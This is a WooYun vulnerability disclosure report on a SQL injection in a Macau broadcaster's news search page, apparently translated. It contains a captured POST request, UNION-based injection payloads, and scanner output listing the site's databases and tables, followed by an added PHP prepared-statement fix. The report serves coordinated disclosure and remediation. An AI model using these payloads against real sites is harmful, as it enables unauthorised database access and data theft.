
Vulnerability summary

Defect ID: wooyun-2016-0169586

Title: 澳門廣播電視 www site SQL injection #2

Affected vendor: 澳門廣播電視股份有限公司

Author: 路人甲

Submitted: 2016-01-13 15:44

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: handed to a third-party partner organisation (CNCERT, the national Internet emergency response centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-13: Details sent to the vendor; awaiting vendor handling
2016-01-15: Vendor confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and relevant domain experts
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Brief description:

Details:

Website:

http://**.**.**.**.mo/


This location has a POST injection:

http://**.**.**.**.mo/c_news/radio_news.php

[screenshot: image not preserved in this copy]


That one is a GET injection. Mine is a POST injection:

<code>
POST /c_news/more_radionews.php HTTP/1.1
Host: **.**.**.**.mo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**.mo/c_news/radio_news.php
Content-Length: 14
Cookie: radio_news_280860=read; radio_news_280876=read; _pk_ref.1.4ee4=%5B%22%22%2C%22%22%2C1452662337%2C%22https%3A%2F%2F**.**.**.**%2Fbaidu%3Ftn%3Dmonline_3_dg%26ie%3Dutf-8%26wd%3D%25E6%25BE%25B3%25E9%2596%2580%25E5%25BB%25A3%25E6%2592%25AD%25E9%259B%25BB%25E8%25A6%2596%25E8%2582%25A1%25E4%25BB%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2585%25AC%25E5%258F%25B8%22%5D; _pk_id.1.4ee4=ffa7456dd793ab7b.1452489872.2.1452662352.1452489976.; __utma=258114639.740007358.1452489872.1452489872.1452662338.2; __utmc=258114639; __utmz=258114639.1452489872.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E6%BE%B3%E9%96%80%E5%BB%A3%E6%92%AD%E9%9B%BB%E8%A6%96%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; _pk_ses.1.4ee4=*; __utmb=258114**.**.**.**2662338; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=&search=1
</code>


The search parameter is injectable (scanner output follows):

Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: type=&search=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(0x3a6d6d763a,0x594177734d65624a4e78,0x3a7169753a), NULL, NULL# AND
A'='hcmA
Place: POST
Parameter: type
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: type=' UNION ALL SELECT CONCAT(0x3a6d6d763a,0x46674f77704c425a
0x3a7169753a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lRIe'='lR
arch=1
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: search, type: Single quoted string (default)
[1] place: POST, parameter: type, type: Single quoted string
[q] Quit
>
[13:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5
[13:20:48] [INFO] fetching current user
current user: 'ctdm@**.**.**.**'


available databases [9]:
[*] ctdm
[*] information_schema
[*] mysql
[*] ptdm
[*] radiopgmwordpress
[*] schedule
[*] system
[*] test
[*] webstat


So many tables:

| wp2_links                                     |
| wp2_ngg_album |
| wp2_ngg_album2gallery_rs |
| wp2_ngg_gallery |
| wp2_ngg_pictures |
| wp2_options |
| wp2_postmeta |
| wp2_posts |
| wp2_role_scope_rs |
| wp2_term_relationships |
| wp2_term_taxonomy |
| wp2_terms |
| wp2_user2group_rs |
| wp2_user2role2object_rs |
| wp2_usermeta |
| wp2_users |
| wp3_chat_log |
| wp3_chat_message |
| wp3_commentmeta |
| wp3_comments |
| wp3_dmsguestbook |
| wp3_groups_rs |
| wp3_links |
| wp3_ngg_album |
| wp3_ngg_album2gallery_rs |
| wp3_ngg_gallery |
| wp3_ngg_pictures |
| wp3_options |
| wp3_postmeta |
| wp3_posts |
| wp3_role_scope_rs |
| wp3_term_relationships |
| wp3_term_taxonomy |
| wp3_terms |
| wp3_user2group_rs |
| wp3_user2role2object_rs |
| wp3_usermeta |
| wp3_users |
| wp4_chat_log |
| wp4_chat_message |
| wp4_commentmeta |
| wp4_comments |
| wp4_dmsguestbook |
| wp4_groups_rs |
| wp4_links |
| wp4_ngg_album |
| wp4_ngg_album2gallery_rs |
| wp4_ngg_gallery |
| wp4_ngg_pictures |
| wp4_options |
| wp4_postmeta |
| wp4_posts |
| wp4_role_scope_rs |
| wp4_term_relationships |
| wp4_term_taxonomy |
| wp4_terms |
| wp4_user2group_rs |
| wp4_user2role2object_rs |
| wp4_usermeta |
| wp4_users |
| wp5_chat_log |
| wp5_chat_message |
| wp5_commentmeta |
| wp5_comments |
| wp5_dmsguestbook |
| wp5_groups_rs |
| wp5_links |
| wp5_ngg_album |
| wp5_ngg_album2gallery_rs |
| wp5_ngg_gallery |
| wp5_ngg_pictures |
| wp5_options |
| wp5_postmeta |
| wp5_posts |
| wp5_role_scope_rs |
| wp5_term_relationships |
| wp5_term_taxonomy |
| wp5_terms |
| wp5_user2group_rs |
| wp5_user2role2object_rs |
| wp5_usermeta |
| wp5_users |
| wp6_chat_log |
| wp6_chat_message |
| wp6_commentmeta |
| wp6_comments |
| wp6_dmsguestbook |
| wp6_groups_rs |
| wp6_links |
| wp6_ngg_album |
| wp6_ngg_album2gallery_rs |
| wp6_ngg_gallery |
| wp6_ngg_pictures |
| wp6_options |
| wp6_postmeta |
| wp6_posts |
| wp6_role_scope_rs |
| wp6_term_relationships |
| wp6_term_taxonomy |
| wp6_terms |
| wp6_user2group_rs |
| wp6_user2role2object_rs |
| wp6_usermeta |
| wp6_users |
| wp7_chat_log |
| wp7_chat_message |
| wp7_commentmeta |
| wp7_comments |
| wp7_dmsguestbook |
| wp7_groups_rs |
| wp7_links |
| wp7_ngg_album |
| wp7_ngg_album2gallery_rs |
| wp7_ngg_gallery |
| wp7_ngg_pictures |
| wp7_options |
| wp7_postmeta |
| wp7_posts |
| wp7_role_scope_rs |
| wp7_term_relationships |
| wp7_term_taxonomy |
| wp7_terms |
| wp7_user2group_rs |
| wp7_user2role2object_rs |
| wp7_usermeta |
| wp7_users |
| wp8_chat_log |
| wp8_chat_message |
| wp8_commentmeta |
| wp8_comments |
| wp8_dmsguestbook |
| wp8_groups_rs |
| wp8_links |
| wp8_ngg_album |
| wp8_ngg_album2gallery_rs |
| wp8_ngg_gallery |
| wp8_ngg_pictures |
| wp8_options |
| wp8_postmeta |
| wp8_posts |
| wp8_role_scope_rs |
| wp8_term_relationships |
| wp8_term_taxonomy |
| wp8_terms |
| wp8_user2group_rs |
| wp8_user2role2object_rs |
| wp8_usermeta |
| wp8_users |
| wp9_chat_log |
| wp9_chat_message |
| wp9_commentmeta |
| wp9_comments |
| wp9_dmsguestbook |
| wp9_groups_rs |
| wp9_links |
| wp9_ngg_album |
| wp9_ngg_album2gallery_rs |
| wp9_ngg_gallery |
| wp9_ngg_pictures |
| wp9_options |
| wp9_postmeta |
| wp9_posts |
| wp9_role_scope_rs |
| wp9_term_relationships |
| wp9_term_taxonomy |
| wp9_terms |
| wp9_user2group_rs |
| wp9_user2role2object_rs |
| wp9_usermeta |
| wp9_users |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
| wpeveningconcerts_commentmeta |
| wpeveningconcerts_comments |
| wpeveningconcerts_dmsguestbook |
| wpeveningconcerts_links |
| wpeveningconcerts_options |
| wpeveningconcerts_postmeta |
| wpeveningconcerts_posts |
| wpeveningconcerts_term_relationships |
| wpeveningconcerts_term_taxonomy |
| wpeveningconcerts_terms |
| wpeveningconcerts_usermeta |
| wpeveningconcerts_users |
| wptest_chat_log |
| wptest_chat_message |
| wptest_commentmeta |
| wptest_comments |
| wptest_dmsguestbook |
| wptest_groups_rs |
| wptest_kaltura_widgets |
| wptest_links |
| wptest_ngg_album |
| wptest_ngg_album2gallery_rs |
| wptest_ngg_gallery |
| wptest_ngg_pictures |
| wptest_options |
| wptest_pollsa |
| wptest_pollsip |
| wptest_pollsq |
| wptest_postmeta |
| wptest_posts |
| wptest_role_scope_rs |
| wptest_term_relationships |
| wptest_term_taxonomy |
| wptest_terms |
| wptest_user2group_rs |
| wptest_user2role2object_rs |
| wptest_usermeta |
| wptest_users |
| wptesting_commentmeta |
| wptesting_comments |
| wptesting_links |
| wptesting_options |
| wptesting_postmeta |
| wptesting_posts |
| wptesting_term_relationships |
| wptesting_term_taxonomy |
| wptesting_terms |
| wptesting_usermeta |
| wptesting_users |
+-----------------------------------------------+
Database: mysql
[24 tables]
+-----------------------------------------------+
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
| user_info |
+-----------------------------------------------+
Database: information_schema
[28 tables]
+-----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+-----------------------------------------------+


Proof of vulnerability:

Remediation:
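The report leaves this section empty. As an added example, not code from the report or from the site's operator, the handler below shows the pattern that closes both reported injection points: the `type` and `search` POST fields reach MySQL only as bound parameters of a server-side prepared statement, so a value shaped like the 22-column UNION payload above is compared as a literal keyword instead of being parsed as SQL. The table and column names (`radio_news`, `title`, `category`, `published_at`), the allowed `type` values and the `DB_*_PLACEHOLDER` credentials are assumptions; the report only identifies the stack as PHP 5.3.3 with MySQL 5, and the code is written to run on that PHP line.

```php
<?php
// Added example for the remediation section; not code from the report or
// from the site's operator. Hardened handler for a POST news search of the
// kind behind more_radionews.php (fields `type` and `search`, as in the
// captured request). Hypothetical: table/column names, category values and
// the DB_*_PLACEHOLDER credentials. Written to run on PHP 5.3 with PDO.

function get_pdo()
{
    // The DSN charset is honoured from PHP 5.3.6 on; older builds ignore it.
    $dsn = 'mysql:host=127.0.0.1;dbname=DB_NAME_PLACEHOLDER;charset=utf8';
    $pdo = new PDO($dsn, 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER');
    // Server-side prepared statements: query text and values are sent to
    // MySQL separately, so a value can never change the statement's shape.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

// `type` selects a fixed category, so it is mapped through an allow-list and
// never becomes part of the SQL text. Unknown or empty -> no category filter.
function normalise_type($raw)
{
    $allowed = array('local' => 'local', 'intl' => 'intl', 'sport' => 'sport');
    if (!is_string($raw) || !isset($allowed[$raw])) {
        return null;
    }
    return $allowed[$raw];
}

function search_radio_news(PDO $pdo, $type, $search)
{
    $category = normalise_type($type);
    $search   = is_string($search) ? trim($search) : '';
    if ($search === '' || strlen($search) > 100) {
        return array();                     // refuse empty/oversized keywords
    }

    $sql = 'SELECT id, title, published_at FROM radio_news WHERE title LIKE :kw';
    if ($category !== null) {
        $sql .= ' AND category = :cat';
    }
    $sql .= ' ORDER BY published_at DESC LIMIT 50';

    $stmt = $pdo->prepare($sql);
    // Escape LIKE metacharacters so "%" and "_" in the keyword match
    // literally; quotes and parentheses need no handling at all, because the
    // bound value is data, not SQL.
    $kw = '%' . addcslashes($search, '%_\\') . '%';
    $stmt->bindValue(':kw', $kw, PDO::PARAM_STR);
    if ($category !== null) {
        $stmt->bindValue(':cat', $category, PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Endpoint wiring: the same two POST fields as the captured request. Output
// is encoded for HTML so the result list cannot turn into a second injection.
$type   = isset($_POST['type'])   ? $_POST['type']   : '';
$search = isset($_POST['search']) ? $_POST['search'] : '';

header('Content-Type: text/html; charset=utf-8');
echo '<ul>';
foreach (search_radio_news(get_pdo(), $type, $search) as $row) {
    echo '<li>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</li>';
}
echo '</ul>';
```

Two points worth checking against the scanner output above when applying this. First, `PDO::ATTR_EMULATE_PREPARES` must be off: with emulation on, PDO builds the query string client-side, which is the same string-concatenation model the vulnerable endpoint uses, just with escaping. Second, the dump shows the web user `ctdm` enumerating nine databases, including `mysql`; whatever account the fixed code connects with should hold only the privileges it needs on its own schema, so that any future injection elsewhere in the site cannot reach the other databases listed.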

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-15 18:13

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to MOCERT for notification, which will coordinate handling with the site's administering organisation.

Latest status:

None yet